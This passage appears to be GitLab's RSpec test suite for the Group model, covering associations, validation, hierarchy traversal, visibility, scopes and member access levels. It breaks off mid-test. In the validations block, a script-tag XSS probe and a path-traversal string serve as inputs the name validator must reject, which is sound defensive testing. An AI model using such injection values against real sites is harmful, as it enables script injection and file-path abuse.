RSpec.describe Group do
include ReloadHelpers
let!(:group) { create(:group) }
describe 'associations' do
it { is_expected.to have_many :projects }
it { is_expected.to have_many(:group_members).dependent(:destroy) }
it { is_expected.to have_many(:users).through(:group_members) }
it { is_expected.to have_many(:owners).through(:group_members) }
it { is_expected.to have_many(:requesters).dependent(:destroy) }
it { is_expected.to have_many(:members_and_requesters) }
it { is_expected.to have_many(:project_group_links).dependent(:destroy) }
it { is_expected.to have_many(:shared_projects).through(:project_group_links) }
it { is_expected.to have_many(:notification_settings).dependent(:destroy) }
it { is_expected.to have_many(:labels).class_name('GroupLabel') }
it { is_expected.to have_many(:variables).class_name('Ci::GroupVariable') }
it { is_expected.to have_many(:uploads) }
it { is_expected.to have_one(:chat_team) }
it { is_expected.to have_many(:custom_attributes).class_name('GroupCustomAttribute') }
it { is_expected.to have_many(:badges).class_name('GroupBadge') }
it { is_expected.to have_many(:cluster_groups).class_name('Clusters::Group') }
it { is_expected.to have_many(:clusters).class_name('Clusters::Cluster') }
it { is_expected.to have_many(:container_repositories) }
it { is_expected.to have_many(:milestones) }
it { is_expected.to have_many(:group_deploy_keys) }
it { is_expected.to have_many(:integrations) }
it { is_expected.to have_one(:dependency_proxy_setting) }
it { is_expected.to have_one(:dependency_proxy_image_ttl_policy) }
it { is_expected.to have_many(:dependency_proxy_blobs) }
it { is_expected.to have_many(:dependency_proxy_manifests) }
it { is_expected.to have_many(:debian_distributions).class_name('Packages::Debian::GroupDistribution').dependent(:destroy) }
it { is_expected.to have_many(:daily_build_group_report_results).class_name('Ci::DailyBuildGroupReportResult') }
describe '#members & #requesters' do
let(:requester) { create(:user) }
let(:developer) { create(:user) }
before do
group.request_access(requester)
group.add_developer(developer)
end
it_behaves_like 'members and requesters associations' do
let(:namespace) { group }
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Referable) }
end
describe 'validations' do
it { is_expected.to validate_presence_of :name }
it { is_expected.to allow_value('group test_4').for(:name) }
it { is_expected.not_to allow_value('test/../foo').for(:name) }
it { is_expected.not_to allow_value('<script>alert("Attack!")</script>').for(:name) }
it { is_expected.to validate_presence_of :path }
it { is_expected.not_to validate_presence_of :owner }
it { is_expected.to validate_presence_of :two_factor_grace_period }
it { is_expected.to validate_numericality_of(:two_factor_grace_period).is_greater_than_or_equal_to(0) }
context 'validating the parent of a group' do
context 'when the group has no parent' do
it 'allows a group to have no parent associated with it' do
group = build(:group)
expect(group).to be_valid
end
end
context 'when the group has a parent' do
it 'does not allow a group to have a namespace as its parent' do
group = build(:group, parent: build(:namespace))
expect(group).not_to be_valid
expect(group.errors[:parent_id].first).to eq('a group cannot have a user namespace as its parent')
end
it 'allows a group to have another group as its parent' do
group = build(:group, parent: build(:group))
expect(group).to be_valid
end
end
context 'when the feature flag `validate_namespace_parent_type` is disabled' do
before do
stub_feature_flags(validate_namespace_parent_type: false)
end
context 'when the group has no parent' do
it 'allows a group to have no parent associated with it' do
group = build(:group)
expect(group).to be_valid
end
end
context 'when the group has a parent' do
it 'allows a group to have a namespace as its parent' do
group = build(:group, parent: build(:namespace))
expect(group).to be_valid
end
it 'allows a group to have another group as its parent' do
group = build(:group, parent: build(:group))
expect(group).to be_valid
end
end
end
end
describe 'path validation' do
it 'rejects paths reserved on the root namespace when the group has no parent' do
group = build(:group, path: 'api')
expect(group).not_to be_valid
end
it 'allows root paths when the group has a parent' do
group = build(:group, path: 'api', parent: create(:group))
expect(group).to be_valid
end
it 'rejects any wildcard paths when not a top level group' do
group = build(:group, path: 'tree', parent: create(:group))
expect(group).not_to be_valid
end
end
describe '#notification_settings' do
let(:user) { create(:user) }
let(:group) { create(:group) }
let(:sub_group) { create(:group, parent_id: group.id) }
before do
group.add_developer(user)
sub_group.add_maintainer(user)
end
it 'also gets notification settings from parent groups' do
expect(sub_group.notification_settings.size).to eq(2)
expect(sub_group.notification_settings).to include(group.notification_settings.first)
end
context 'when sub group is deleted' do
it 'does not delete parent notification settings' do
expect do
sub_group.destroy
end.to change { NotificationSetting.count }.by(-1)
end
end
end
describe '#notification_email_for' do
let(:user) { create(:user) }
let(:group) { create(:group) }
let(:subgroup) { create(:group, parent: group) }
let(:group_notification_email) { '[email protected]' }
let(:subgroup_notification_email) { '[email protected]' }
before do
create(:email, :confirmed, user: user, email: group_notification_email)
create(:email, :confirmed, user: user, email: subgroup_notification_email)
end
subject { subgroup.notification_email_for(user) }
context 'when both group notification emails are set' do
it 'returns subgroup notification email' do
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
create(:notification_setting, user: user, source: subgroup, notification_email: subgroup_notification_email)
is_expected.to eq(subgroup_notification_email)
end
end
context 'when subgroup notification email is blank' do
it 'returns parent group notification email' do
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
create(:notification_setting, user: user, source: subgroup, notification_email: '')
is_expected.to eq(group_notification_email)
end
end
context 'when only the parent group notification email is set' do
it 'returns parent group notification email' do
create(:notification_setting, user: user, source: group, notification_email: group_notification_email)
is_expected.to eq(group_notification_email)
end
end
end
describe '#visibility_level_allowed_by_parent' do
let(:parent) { create(:group, :internal) }
let(:sub_group) { build(:group, parent_id: parent.id) }
context 'without a parent' do
it 'is valid' do
sub_group.parent_id = nil
expect(sub_group).to be_valid
end
end
context 'with a parent' do
context 'when visibility of sub group is greater than the parent' do
it 'is invalid' do
sub_group.visibility_level = Gitlab::VisibilityLevel::PUBLIC
expect(sub_group).to be_invalid
end
end
context 'when visibility of sub group is lower or equal to the parent' do
[Gitlab::VisibilityLevel::INTERNAL, Gitlab::VisibilityLevel::PRIVATE].each do |level|
it 'is valid' do
sub_group.visibility_level = level
expect(sub_group).to be_valid
end
end
end
end
end
describe '#visibility_level_allowed_by_projects' do
let!(:internal_group) { create(:group, :internal) }
let!(:internal_project) { create(:project, :internal, group: internal_group) }
context 'when group has a lower visibility' do
it 'is invalid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PRIVATE
expect(internal_group).to be_invalid
expect(internal_group.errors[:visibility_level]).to include('private is not allowed since this group contains projects with higher visibility.')
end
end
context 'when group has a higher visibility' do
it 'is valid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PUBLIC
expect(internal_group).to be_valid
end
end
end
describe '#visibility_level_allowed_by_sub_groups' do
let!(:internal_group) { create(:group, :internal) }
let!(:internal_sub_group) { create(:group, :internal, parent: internal_group) }
context 'when parent group has a lower visibility' do
it 'is invalid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PRIVATE
expect(internal_group).to be_invalid
expect(internal_group.errors[:visibility_level]).to include('private is not allowed since there are sub-groups with higher visibility.')
end
end
context 'when parent group has a higher visibility' do
it 'is valid' do
internal_group.visibility_level = Gitlab::VisibilityLevel::PUBLIC
expect(internal_group).to be_valid
end
end
end
describe '#two_factor_authentication_allowed' do
let_it_be_with_reload(:group) { create(:group) }
context 'for a parent group' do
it 'is valid' do
group.require_two_factor_authentication = true
expect(group).to be_valid
end
end
context 'for a child group' do
let(:sub_group) { create(:group, parent: group) }
it 'is valid when parent group allows' do
sub_group.require_two_factor_authentication = true
expect(sub_group).to be_valid
end
it 'is invalid when parent group blocks' do
group.namespace_settings.update!(allow_mfa_for_subgroups: false)
sub_group.require_two_factor_authentication = true
expect(sub_group).to be_invalid
expect(sub_group.errors[:require_two_factor_authentication]).to include('is forbidden by a top-level group')
end
end
end
end
context 'traversal_ids on create' do
context 'default traversal_ids' do
let(:group) { build(:group) }
before do
group.save!
group.reload
end
it { expect(group.traversal_ids).to eq [group.id] }
end
context 'has a parent' do
let(:parent) { create(:group) }
let(:group) { build(:group, parent: parent) }
before do
group.save!
reload_models(parent, group)
end
it { expect(parent.traversal_ids).to eq [parent.id] }
it { expect(group.traversal_ids).to eq [parent.id, group.id] }
end
context 'has a parent update before save' do
let(:parent) { create(:group) }
let(:group) { build(:group, parent: parent) }
let!(:new_grandparent) { create(:group) }
before do
parent.update!(parent: new_grandparent)
group.save!
reload_models(parent, group)
end
it 'avoid traversal_ids race condition' do
expect(parent.traversal_ids).to eq [new_grandparent.id, parent.id]
expect(group.traversal_ids).to eq [new_grandparent.id, parent.id, group.id]
end
end
end
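
  # For orientation: traversal_ids is a materialized path, so a group nested
  # as root -> parent -> child stores [root.id, parent.id, child.id]. That is
  # the invariant the contexts above and below assert.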
context 'traversal_ids on update' do
context 'parent is updated' do
let(:new_parent) { create(:group) }
      subject { group.update!(parent: new_parent, name: 'new name') }
it_behaves_like 'update on column', :traversal_ids
end
context 'parent is not updated' do
subject { group.update!(name: 'new name') }
it_behaves_like 'no update on column', :traversal_ids
end
end
context 'traversal_ids on ancestral update' do
context 'update multiple ancestors before save' do
let(:parent) { create(:group) }
let(:group) { create(:group, parent: parent) }
let!(:new_grandparent) { create(:group) }
let!(:new_parent) { create(:group) }
before do
group.parent = new_parent
new_parent.update!(parent: new_grandparent)
group.save!
reload_models(parent, group, new_grandparent, new_parent)
end
it 'avoids traversal_ids race condition' do
expect(parent.traversal_ids).to eq [parent.id]
expect(group.traversal_ids).to eq [new_grandparent.id, new_parent.id, group.id]
expect(new_grandparent.traversal_ids).to eq [new_grandparent.id]
expect(new_parent.traversal_ids).to eq [new_grandparent.id, new_parent.id]
end
end
context 'assign a new parent' do
let!(:group) { create(:group, parent: old_parent) }
let(:recorded_queries) { ActiveRecord::QueryRecorder.new }
subject do
recorded_queries.record do
group.update(parent: new_parent)
end
end
before do
subject
reload_models(old_parent, new_parent, group)
end
context 'within the same hierarchy' do
let!(:root) { create(:group).reload }
let!(:old_parent) { create(:group, parent: root) }
let!(:new_parent) { create(:group, parent: root) }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [root.id, new_parent.id, group.id]
end
it_behaves_like 'hierarchy with traversal_ids'
it_behaves_like 'locked row' do
let(:row) { root }
end
end
context 'to another hierarchy' do
let!(:old_parent) { create(:group) }
let!(:new_parent) { create(:group) }
let!(:group) { create(:group, parent: old_parent) }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [new_parent.id, group.id]
end
it_behaves_like 'locked rows' do
let(:rows) { [old_parent, new_parent] }
end
context 'old hierarchy' do
let(:root) { old_parent.root_ancestor }
it_behaves_like 'hierarchy with traversal_ids'
end
context 'new hierarchy' do
let(:root) { new_parent.root_ancestor }
it_behaves_like 'hierarchy with traversal_ids'
end
end
context 'from being a root ancestor' do
let!(:old_parent) { nil }
let!(:new_parent) { create(:group) }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [new_parent.id, group.id]
end
it_behaves_like 'locked rows' do
let(:rows) { [group, new_parent] }
end
it_behaves_like 'hierarchy with traversal_ids' do
let(:root) { new_parent }
end
end
context 'to being a root ancestor' do
let!(:old_parent) { create(:group) }
let!(:new_parent) { nil }
it 'updates traversal_ids' do
expect(group.traversal_ids).to eq [group.id]
end
it_behaves_like 'locked rows' do
let(:rows) { [old_parent, group] }
end
it_behaves_like 'hierarchy with traversal_ids' do
let(:root) { group }
end
end
end
context 'assigning a new grandparent' do
let!(:old_grandparent) { create(:group) }
let!(:new_grandparent) { create(:group) }
let!(:parent_group) { create(:group, parent: old_grandparent) }
let!(:group) { create(:group, parent: parent_group) }
before do
parent_group.update(parent: new_grandparent)
end
it 'updates traversal_ids for all descendants' do
expect(parent_group.reload.traversal_ids).to eq [new_grandparent.id, parent_group.id]
expect(group.reload.traversal_ids).to eq [new_grandparent.id, parent_group.id, group.id]
end
end
end
context 'traversal queries' do
let_it_be(:group, reload: true) { create(:group, :nested) }
context 'recursive' do
before do
stub_feature_flags(use_traversal_ids: false)
end
it_behaves_like 'namespace traversal'
describe '#self_and_descendants' do
it { expect(group.self_and_descendants.to_sql).not_to include 'traversal_ids @>' }
end
describe '#self_and_descendant_ids' do
it { expect(group.self_and_descendant_ids.to_sql).not_to include 'traversal_ids @>' }
end
describe '#descendants' do
it { expect(group.descendants.to_sql).not_to include 'traversal_ids @>' }
end
describe '#ancestors' do
it { expect(group.ancestors.to_sql).not_to include 'traversal_ids <@' }
end
end
context 'linear' do
it_behaves_like 'namespace traversal'
describe '#self_and_descendants' do
it { expect(group.self_and_descendants.to_sql).to include 'traversal_ids @>' }
end
describe '#self_and_descendant_ids' do
it { expect(group.self_and_descendant_ids.to_sql).to include 'traversal_ids @>' }
end
describe '#descendants' do
it { expect(group.descendants.to_sql).to include 'traversal_ids @>' }
end
describe '#ancestors' do
it { expect(group.ancestors.to_sql).to include "\"namespaces\".\"id\" = #{group.parent_id}" }
it 'hierarchy order' do
expect(group.ancestors(hierarchy_order: :asc).to_sql).to include 'ORDER BY "depth" ASC'
end
context 'ancestor linear queries feature flag disabled' do
before do
stub_feature_flags(use_traversal_ids_for_ancestors: false)
end
it { expect(group.ancestors.to_sql).not_to include 'traversal_ids <@' }
end
end
end
end
describe '.without_integration' do
let(:another_group) { create(:group) }
let(:instance_integration) { build(:jira_integration, :instance) }
before do
create(:jira_integration, group: group, project: nil)
create(:integrations_slack, group: another_group, project: nil)
end
it 'returns groups without integration' do
expect(Group.without_integration(instance_integration)).to contain_exactly(another_group)
end
end
describe '.public_or_visible_to_user' do
let!(:private_group) { create(:group, :private) }
let!(:internal_group) { create(:group, :internal) }
subject { described_class.public_or_visible_to_user(user) }
context 'when user is nil' do
let!(:user) { nil }
it { is_expected.to match_array([group]) }
end
context 'when user' do
let!(:user) { create(:user) }
context 'when user does not have access to any private group' do
it { is_expected.to match_array([internal_group, group]) }
end
context 'when user is a member of private group' do
before do
private_group.add_user(user, Gitlab::Access::DEVELOPER)
end
it { is_expected.to match_array([private_group, internal_group, group]) }
end
context 'when user is a member of private subgroup' do
let!(:private_subgroup) { create(:group, :private, parent: private_group) }
before do
private_subgroup.add_user(user, Gitlab::Access::DEVELOPER)
end
it { is_expected.to match_array([private_subgroup, internal_group, group]) }
end
end
end
describe 'scopes' do
let_it_be(:private_group) { create(:group, :private) }
let_it_be(:internal_group) { create(:group, :internal) }
let_it_be(:user1) { create(:user) }
let_it_be(:user2) { create(:user) }
describe 'public_only' do
subject { described_class.public_only.to_a }
it { is_expected.to eq([group]) }
end
describe 'public_and_internal_only' do
subject { described_class.public_and_internal_only.to_a }
it { is_expected.to match_array([group, internal_group]) }
end
describe 'non_public_only' do
subject { described_class.non_public_only.to_a }
it { is_expected.to match_array([private_group, internal_group]) }
end
describe 'private_only' do
subject { described_class.private_only.to_a }
it { is_expected.to match_array([private_group]) }
end
describe 'with_onboarding_progress' do
subject { described_class.with_onboarding_progress }
it 'joins onboarding_progress' do
create(:onboarding_progress, namespace: group)
expect(subject).to eq([group])
end
end
describe 'for_authorized_group_members' do
let_it_be(:group_member1) { create(:group_member, source: private_group, user_id: user1.id, access_level: Gitlab::Access::OWNER) }
it do
result = described_class.for_authorized_group_members([user1.id, user2.id])
expect(result).to match_array([private_group])
end
end
describe 'for_authorized_project_members' do
let_it_be(:project) { create(:project, group: internal_group) }
let_it_be(:project_member1) { create(:project_member, source: project, user_id: user1.id, access_level: Gitlab::Access::DEVELOPER) }
it do
result = described_class.for_authorized_project_members([user1.id, user2.id])
expect(result).to match_array([internal_group])
end
end
end
describe '#to_reference' do
it 'returns a String reference to the object' do
expect(group.to_reference).to eq "@#{group.name}"
end
end
describe '#users' do
it { expect(group.users).to eq(group.owners) }
end
describe '#human_name' do
it { expect(group.human_name).to eq(group.name) }
end
describe '#add_user' do
let(:user) { create(:user) }
before do
group.add_user(user, GroupMember::MAINTAINER)
end
it { expect(group.group_members.maintainers.map(&:user)).to include(user) }
end
describe '#add_users' do
let(:user) { create(:user) }
before do
group.add_users([user.id], GroupMember::GUEST)
end
it "updates the group permission" do
expect(group.group_members.guests.map(&:user)).to include(user)
group.add_users([user.id], GroupMember::DEVELOPER)
expect(group.group_members.developers.map(&:user)).to include(user)
expect(group.group_members.guests.map(&:user)).not_to include(user)
end
end
describe '#avatar_type' do
let(:user) { create(:user) }
before do
group.add_user(user, GroupMember::MAINTAINER)
end
it "is true if avatar is image" do
group.update_attribute(:avatar, 'uploads/avatar.png')
expect(group.avatar_type).to be_truthy
end
it "is false if avatar is html page" do
group.update_attribute(:avatar, 'uploads/avatar.html')
group.avatar_type
expect(group.errors.added?(:avatar, "file format is not supported. Please try one of the following supported formats: png, jpg, jpeg, gif, bmp, tiff, ico, webp")).to be true
end
end
describe '#avatar_url' do
let!(:group) { create(:group, :with_avatar) }
let(:user) { create(:user) }
context 'when avatar file is uploaded' do
before do
group.add_maintainer(user)
end
it 'shows correct avatar url' do
expect(group.avatar_url).to eq(group.avatar.url)
expect(group.avatar_url(only_path: false)).to eq([Gitlab.config.gitlab.url, group.avatar.url].join)
end
end
end
describe '.search' do
it 'returns groups with a matching name' do
expect(described_class.search(group.name)).to eq([group])
end
it 'returns groups with a partially matching name' do
expect(described_class.search(group.name[0..2])).to eq([group])
end
it 'returns groups with a matching name regardless of the casing' do
expect(described_class.search(group.name.upcase)).to eq([group])
end
it 'returns groups with a matching path' do
expect(described_class.search(group.path)).to eq([group])
end
it 'returns groups with a partially matching path' do
expect(described_class.search(group.path[0..2])).to eq([group])
end
it 'returns groups with a matching path regardless of the casing' do
expect(described_class.search(group.path.upcase)).to eq([group])
end
end
describe '#has_owner?' do
before do
@members = setup_group_members(group)
create(:group_member, :invited, :owner, group: group)
end
it { expect(group.has_owner?(@members[:owner])).to be_truthy }
it { expect(group.has_owner?(@members[:maintainer])).to be_falsey }
it { expect(group.has_owner?(@members[:developer])).to be_falsey }
it { expect(group.has_owner?(@members[:reporter])).to be_falsey }
it { expect(group.has_owner?(@members[:guest])).to be_falsey }
it { expect(group.has_owner?(@members[:requester])).to be_falsey }
it { expect(group.has_owner?(nil)).to be_falsey }
end
describe '#has_maintainer?' do
before do
@members = setup_group_members(group)
create(:group_member, :invited, :maintainer, group: group)
end
it { expect(group.has_maintainer?(@members[:owner])).to be_falsey }
it { expect(group.has_maintainer?(@members[:maintainer])).to be_truthy }
it { expect(group.has_maintainer?(@members[:developer])).to be_falsey }
it { expect(group.has_maintainer?(@members[:reporter])).to be_falsey }
it { expect(group.has_maintainer?(@members[:guest])).to be_falsey }
it { expect(group.has_maintainer?(@members[:requester])).to be_falsey }
it { expect(group.has_maintainer?(nil)).to be_falsey }
end
describe '#last_owner?' do
before do
@members = setup_group_members(group)
end
it { expect(group.last_owner?(@members[:owner])).to be_truthy }
context 'with two owners' do
before do
create(:group_member, :owner, group: group)
end
it { expect(group.last_owner?(@members[:owner])).to be_falsy }
end
context 'with owners from a parent' do
before do
parent_group = create(:group)
create(:group_member, :owner, group: parent_group)
group.update(parent: parent_group)
end
it { expect(group.last_owner?(@members[:owner])).to be_falsy }
end
end
describe '#member_last_blocked_owner?' do
let_it_be(:blocked_user) { create(:user, :blocked) }
let(:member) { blocked_user.group_members.last }
before do
group.add_user(blocked_user, GroupMember::OWNER)
end
context 'when last_blocked_owner is set' do
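# If `last_blocked_owner` is already set on the member (e.g. preset by a
# caller that batch-computed it), the group trusts that value and must not
# fall back to the more expensive `members_with_parents` lookup.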
before do
expect(group).not_to receive(:members_with_parents)
end
it 'returns true' do
member.last_blocked_owner = true
expect(group.member_last_blocked_owner?(member)).to be(true)
end
it 'returns false' do
member.last_blocked_owner = false
expect(group.member_last_blocked_owner?(member)).to be(false)
end
end
context 'when last_blocked_owner is not set' do
it { expect(group.member_last_blocked_owner?(member)).to be(true) }
context 'with another active owner' do
before do
group.add_user(create(:user), GroupMember::OWNER)
end
it { expect(group.member_last_blocked_owner?(member)).to be(false) }
end
context 'with 2 blocked owners' do
before do
group.add_user(create(:user, :blocked), GroupMember::OWNER)
end
it { expect(group.member_last_blocked_owner?(member)).to be(false) }
end
context 'with owners from a parent' do
before do
parent_group = create(:group)
create(:group_member, :owner, group: parent_group)
group.update(parent: parent_group)
end
it { expect(group.member_last_blocked_owner?(member)).to be(false) }
end
end
end
context 'when analyzing blocked owners' do
let_it_be(:blocked_user) { create(:user, :blocked) }
describe '#single_blocked_owner?' do
context 'when there is only one blocked owner' do
before do
group.add_user(blocked_user, GroupMember::OWNER)
end
it 'returns true' do
expect(group.single_blocked_owner?).to eq(true)
end
end
context 'when there are multiple blocked owners' do
let_it_be(:blocked_user_2) { create(:user, :blocked) }
before do
group.add_user(blocked_user, GroupMember::OWNER)
group.add_user(blocked_user_2, GroupMember::OWNER)
end
it 'returns false' do
expect(group.single_blocked_owner?).to eq(false)
end
end
context 'when there are no blocked owners' do
it 'returns false' do
expect(group.single_blocked_owner?).to eq(false)
end
end
end
describe '#blocked_owners' do
let_it_be(:user) { create(:user) }
before do
group.add_user(blocked_user, GroupMember::OWNER)
group.add_user(user, GroupMember::OWNER)
end
it 'has only blocked owners' do
expect(group.blocked_owners.map(&:user)).to match([blocked_user])
end
end
end
describe '#single_owner?' do
let_it_be(:user) { create(:user) }
context 'when there is only one owner' do
before do
group.add_user(user, GroupMember::OWNER)
end
it 'returns true' do
expect(group.single_owner?).to eq(true)
end
end
context 'when there are multiple owners' do
let_it_be(:user_2) { create(:user) }
before do
group.add_user(user, GroupMember::OWNER)
group.add_user(user_2, GroupMember::OWNER)
end
it 'returns false' do
expect(group.single_owner?).to eq(false)
end
end
context 'when there are no owners' do
it 'returns false' do
expect(group.single_owner?).to eq(false)
end
end
end
describe '#member_last_owner?' do
let_it_be(:user) { create(:user) }
let(:member) { group.members.last }
before do
group.add_user(user, GroupMember::OWNER)
end
context 'when last_owner is set' do
before do
expect(group).not_to receive(:last_owner?)
end
it 'returns true' do
member.last_owner = true
expect(group.member_last_owner?(member)).to be(true)
end
it 'returns false' do
member.last_owner = false
expect(group.member_last_owner?(member)).to be(false)
end
end
context 'when last_owner is not set' do
it 'returns true' do
expect(group).to receive(:last_owner?).and_call_original
expect(group.member_last_owner?(member)).to be(true)
end
end
end
describe '#lfs_enabled?' do
context 'LFS enabled globally' do
before do
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
it 'returns true when nothing is set' do
expect(group.lfs_enabled?).to be_truthy
end
it 'returns false when set to false' do
group.update_attribute(:lfs_enabled, false)
expect(group.lfs_enabled?).to be_falsey
end
it 'returns true when set to true' do
group.update_attribute(:lfs_enabled, true)
expect(group.lfs_enabled?).to be_truthy
end
end
context 'LFS disabled globally' do
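# The instance-level LFS setting acts as a hard off switch: when it is
# disabled, the group attribute is ignored and lfs_enabled? is always false.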
before do
allow(Gitlab.config.lfs).to receive(:enabled).and_return(false)
end
it 'returns false when nothing is set' do
expect(group.lfs_enabled?).to be_falsey
end
it 'returns false when set to false' do
group.update_attribute(:lfs_enabled, false)
expect(group.lfs_enabled?).to be_falsey
end
it 'returns false when set to true' do
group.update_attribute(:lfs_enabled, true)
expect(group.lfs_enabled?).to be_falsey
end
end
end
describe '#owners' do
let(:owner) { create(:user) }
let(:developer) { create(:user) }
it 'returns the owners of a Group' do
group.add_owner(owner)
group.add_developer(developer)
expect(group.owners).to eq([owner])
end
end
def setup_group_members(group)
members = {
owner: create(:user),
maintainer: create(:user),
developer: create(:user),
reporter: create(:user),
guest: create(:user),
requester: create(:user)
}
group.add_user(members[:owner], GroupMember::OWNER)
group.add_user(members[:maintainer], GroupMember::MAINTAINER)
group.add_user(members[:developer], GroupMember::DEVELOPER)
group.add_user(members[:reporter], GroupMember::REPORTER)
group.add_user(members[:guest], GroupMember::GUEST)
group.request_access(members[:requester])
members
end
describe '#web_url' do
it 'returns the canonical URL' do
expect(group.web_url).to include("groups/#{group.name}")
end
context 'nested group' do
let(:nested_group) { create(:group, :nested) }
it { expect(nested_group.web_url).to include("groups/#{nested_group.full_path}") }
end
end
describe 'nested group' do
subject { build(:group, :nested) }
it { is_expected.to be_valid }
it { expect(subject.parent).to be_kind_of(described_class) }
end
describe '#max_member_access_for_user' do
let_it_be(:group_user) { create(:user) }
context 'with user in the group' do
before do
group.add_owner(group_user)
end
it 'returns correct access level' do
expect(group.max_member_access_for_user(group_user)).to eq(Gitlab::Access::OWNER)
end
end
context 'when user is nil' do
it 'returns NO_ACCESS' do
expect(group.max_member_access_for_user(nil)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'evaluating admin access level' do
let_it_be(:admin) { create(:admin) }
context 'when admin mode is enabled', :enable_admin_mode do
it 'returns OWNER by default' do
expect(group.max_member_access_for_user(admin)).to eq(Gitlab::Access::OWNER)
end
end
context 'when admin mode is disabled' do
it 'returns NO_ACCESS' do
expect(group.max_member_access_for_user(admin)).to eq(Gitlab::Access::NO_ACCESS)
end
end
it 'returns NO_ACCESS when only concrete membership should be considered' do
expect(group.max_member_access_for_user(admin, only_concrete_membership: true))
.to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'group shared with another group' do
let_it_be(:parent_group_user) { create(:user) }
let_it_be(:child_group_user) { create(:user) }
let_it_be(:group_parent) { create(:group, :private) }
let_it_be(:group) { create(:group, :private, parent: group_parent) }
let_it_be(:group_child) { create(:group, :private, parent: group) }
let_it_be(:shared_group_parent) { create(:group, :private) }
let_it_be(:shared_group) { create(:group, :private, parent: shared_group_parent) }
let_it_be(:shared_group_child) { create(:group, :private, parent: shared_group) }
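# `group` is invited into `shared_group` with DEVELOPER as the maximum
# access for the share, so members of `group` receive the lower of their
# own role and DEVELOPER throughout the shared subtree.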
before do
group_parent.add_owner(parent_group_user)
group.add_owner(group_user)
group_child.add_owner(child_group_user)
create(:group_group_link, { shared_with_group: group,
shared_group: shared_group,
group_access: GroupMember::DEVELOPER })
end
context 'with user in the group' do
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(group_user)).to eq(Gitlab::Access::DEVELOPER)
expect(shared_group_child.max_member_access_for_user(group_user)).to eq(Gitlab::Access::DEVELOPER)
end
context 'with lower group access level than max access level for share' do
let(:user) { create(:user) }
it 'returns correct access level' do
group.add_reporter(user)
expect(shared_group_parent.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::REPORTER)
expect(shared_group_child.max_member_access_for_user(user)).to eq(Gitlab::Access::REPORTER)
end
end
end
context 'with user in the parent group' do
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(parent_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(parent_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(parent_group_user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'with user in the child group' do
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(child_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(child_group_user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(child_group_user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'unrelated project owner' do
let(:common_id) { [Project.maximum(:id).to_i, Namespace.maximum(:id).to_i].max + 999 }
let!(:group) { create(:group, id: common_id) }
let!(:unrelated_project) { create(:project, id: common_id) }
let(:user) { unrelated_project.owner }
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
context 'user without accepted access request' do
let!(:user) { create(:user) }
before do
create(:group_member, :developer, :access_request, user: user, group: group)
end
it 'returns correct access level' do
expect(shared_group_parent.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
expect(shared_group_child.max_member_access_for_user(user)).to eq(Gitlab::Access::NO_ACCESS)
end
end
end
context 'multiple groups shared with group' do
let(:user) { create(:user) }
let(:group) { create(:group, :private) }
let(:shared_group_parent) { create(:group, :private) }
let(:shared_group) { create(:group, :private, parent: shared_group_parent) }
before do
group.add_owner(user)
create(:group_group_link, { shared_with_group: group,
shared_group: shared_group,
group_access: GroupMember::DEVELOPER })
create(:group_group_link, { shared_with_group: group,
shared_group: shared_group_parent,
group_access: GroupMember::MAINTAINER })
end
it 'returns correct access level' do
expect(shared_group.max_member_access_for_user(user)).to eq(Gitlab::Access::MAINTAINER)
end
end
end
describe '#direct_members' do
let_it_be(:group) { create(:group, :nested) }
let_it_be(:maintainer) { group.parent.add_user(create(:user), GroupMember::MAINTAINER) }
let_it_be(:developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
it 'does not return members of the parent' do
expect(group.direct_members).not_to include(maintainer)
end
it 'returns the direct member of the group' do
expect(group.direct_members).to include(developer)
end
context 'group sharing' do
let!(:shared_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'does not return members of the shared_with group' do
expect(shared_group.direct_members).not_to(
include(developer))
end
end
end
shared_examples_for 'members_with_parents' do
let!(:group) { create(:group, :nested) }
let!(:maintainer) { group.parent.add_user(create(:user), GroupMember::MAINTAINER) }
let!(:developer) { group.add_user(create(:user), GroupMember::DEVELOPER) }
it 'returns parents members' do
expect(group.members_with_parents).to include(developer)
expect(group.members_with_parents).to include(maintainer)
end
context 'group sharing' do
let!(:shared_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'returns shared with group members' do
expect(shared_group.members_with_parents).to(
include(developer))
end
end
end
describe '#members_with_parents' do
it_behaves_like 'members_with_parents'
end
describe '#authorizable_members_with_parents' do
let(:group) { create(:group) }
it_behaves_like 'members_with_parents'
context 'members with associated user but also having invite_token' do
let!(:member) { create(:group_member, :developer, :invited, user: create(:user), group: group) }
it 'includes such members in the result' do
expect(group.authorizable_members_with_parents).to include(member)
